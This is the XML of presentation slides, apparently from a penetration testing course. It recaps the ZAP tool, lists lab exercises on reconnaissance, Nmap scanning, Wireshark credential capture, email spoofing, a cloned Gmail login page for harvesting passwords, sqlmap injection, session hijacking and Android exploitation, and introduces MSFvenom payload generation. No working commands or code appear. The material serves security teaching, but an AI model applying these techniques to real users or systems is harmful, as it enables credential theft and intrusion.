              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Recap About ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1638" name="Google Shape;1638;p235"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385775" y="1234450"/>
            <a:ext cx="8049000" cy="3559800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ZAP is a free, open-source community developed tool aimed at making the online world more secure.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Some of the ideals that have driven zap are listed below                                                                                    </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>     * help user develop and apply application security skills.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>     * build a competitive, open source, and community oriented platform.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>     * provide an extensible platform for testing .</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>     * designed to be easy to use.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> *  raise the bar for other security tools.  </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1639" name="Google Shape;1639;p235"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solid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236"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="467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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</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12. Enumerates MySQL Info and Enumerates Directories Used by Web Servers by using NMAP</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13. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</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14. Use Kali Linux on DVWA Cloud</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15.  Perform SQL injection attack using SQL Map in kaliLinux.</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16. Perform session hijacking using Zed Attack Proxy (ZAP).</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17. Exploiting vulnerabilities in android mobile operating system</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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237"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25905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17</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1650" name="Google Shape;1650;p237"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="5541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Exploiting Vulnerabilities in Android Mobile Operating System</a:t>
            </a:r>
            <a:endParaRPr sz="240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23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656" name="Google Shape;1656;p238"/>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fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-358140" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Before we start, let’s talk about MSFvenom. </a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-358140" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It is a combination of MSFpayload and MSFencode. </a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-358140" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules.</a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-358140" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Merging these two tools into a single tool just makes sense. </a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-358140" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It standardizes the command-line options, speeds things up a bit by using a single framework instance and handles all possible output formats. </a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-358140" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>MSFvenom is used to make a payload to penetrate the Android emulator.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>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23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662" name="Google Shape;1662;p239"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In this lecture, we are exploring Kali Linux and an Android device to perform mobile penetration testing. </a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Kali Linux is one of the Debian-based operating systems with several tools aimed at various information security tasks such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="551A8B"/>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penetration testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="551A8B"/>
                </a:solid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forensics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="551A8B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Aria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reverse engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Kali Linux is one of the most-used operating systems for penetration testing.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Android Emulator is used as an Android device on which penetration testing tasks can be performed (if you don’t have an actual Android device).</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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7" name="Google Shape;1667;p24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668" name="Google Shape;1668;p240"/>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fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-358140" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Before we start, let’s talk about MSFvenom. </a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-358140" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It is a combination of MSFpayload and MSFencode. </a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-358140" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules.</a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-358140" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Merging these two tools into a single tool just makes sense. </a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-358140" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It standardizes the command-line options, speeds things up a bit by using a single framework instance and handles all possible output formats. </a:t>
            </a:r>
            <a:endParaRPr sz="5100">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-358140" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
